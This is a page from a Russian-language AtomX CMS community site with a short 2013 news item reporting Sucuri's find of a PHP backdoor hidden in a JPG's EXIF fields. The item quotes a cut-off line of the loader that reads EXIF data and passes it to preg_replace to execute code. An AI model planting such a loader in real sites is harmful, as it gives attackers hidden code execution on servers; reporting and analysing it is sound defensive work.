Voting

Какую CMS Вы предпочитаете

AtomX

Fapos CMS

Drunya CMS

Recent comments

Автор: Drunya, в новости:

AtomX 2.8 Beta - Новая версия бесплатной CMS

Автор: xxxproms, в новости:

AtomX 2.8 Beta - Новая версия бесплатной CMS

Автор: Drunya, в новости:

Программирование - что может быть проще.

Автор: setcode, в новости:

Программирование - что может быть проще.

Автор: BAH0, в новости:

AtomX 2.8 Beta - Новая версия бесплатной CMS

Автор: Drunya, в новости:

AtomX 2.8 Beta - Новая версия бесплатной CMS

Автор: kot14, в новости:

Написание простого вируса в блокноте

Автор: чайник, в новости:

Что такое API и для чего они нужны

Автор: HIshnik, в новости:

Классы в PHP для чайников

Автор: Аноним, в новости:

Написание простого вируса в блокноте

Top users

Drunya
Репутация: 110
Сообщений: 3527

Сашка_из_Шебекино
Репутация: 87
Сообщений: 1803

boriska
Репутация: 65
Сообщений: 846

ARMI
Репутация: 46
Сообщений: 1858

BAH0
Репутация: 26
Сообщений: 544

Весь рейтинг

Sites on AtomX CMS

Home » Новости

Total materials:1

4059 2

Код бэкдора спрятан в JPG EXIF

Компания Sucuri обнаружила новый способ внедрения бэкдора на веб-сайт: код прячется в служебном поле EXIF изображения JPG. Это может
быть или новое изображение, которое пользователям разрешено добавлять на
сайт, например, в качестве своего аватара или другой фотографии на
форуме. Или это может быть измененная версия оригинального изображения.

На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для
считывания служебных данных EXIF из файла JPG, а вторая функция
запускает программу.

Code:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');preg_replace($exif['Make'],$exif['Model'],'

Автор: Сашка_из_Шебекино Раздел: Разное Добавлено: 17 Jul 2013

Категории:

Сейчас online: 26. Зарегистрированных: 2. Гостей: 24.

Yandex[bot], Google[bot]